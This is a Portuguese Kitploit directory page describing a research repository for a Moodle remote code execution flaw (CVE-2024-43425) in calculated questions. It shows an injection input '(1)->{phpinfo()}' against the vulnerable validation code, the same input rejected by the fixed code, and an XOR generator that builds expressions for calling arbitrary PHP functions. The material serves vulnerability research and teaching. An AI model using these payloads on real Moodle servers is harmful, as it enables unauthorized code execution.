Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
moodle-rce-calculatedquestions — Scripts para Análise de uma RCE em Questões Calculadas do Moodle (CVE-2024-43425) | Kitploit
Ferramentas/GitHubGitHub/redteampentesting/moodle-rce-calculatedquestions
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubredteampentesting/moodle-rce-calculatedquestions

moodle-rce-calculatedquestions

Scripts para Análise de uma RCE em Questões Calculadas do Moodle (CVE-2024-43425)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
195há 1 anoAinda não revisado

Scripts para Testar a Validação de Entrada em Questões Calculadas do Moodle (CVE-2024-43425)

Este repositório contém os scripts de apoio ao artigo De Volta às Aulas - Explorando uma Vulnerabilidade de Execução Remota de Código no Moodle, que descreve uma vulnerabilidade de execução remota de código na plataforma de aprendizagem Moodle.

Testar a Lógica de Validação

Os scripts no diretório validation podem ser usados para testar strings de entrada diretamente contra a lógica de validação usada pelo Moodle para evitar o abuso de uma chamada ao eval() do PHP.

Todos os trechos de código foram diretamente adaptados do código-fonte do Moodle, usando a versão 4.4.1 para a versão vulnerável e a 4.4.2 para a versão corrigida. Os scripts incluem as partes relevantes do arquivo question/type/calculated/questiontype.php.

O arquivo validation.php usa a lógica de validação vulnerável:

root@kitploit:~
$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]

Este repositório também inclui a versão corrigida do código de validação em validation-fixed.php:

root@kitploit:~
$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]

Gerar Nomes de Funções

O script xor-generator.py pode ser usado para gerar expressões baseadas em funções variáveis, que permitem chamar funções PHP arbitrárias com um único parâmetro numérico em versões vulneráveis do Moodle:

root@kitploit:~
$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test
Baixar ferramenta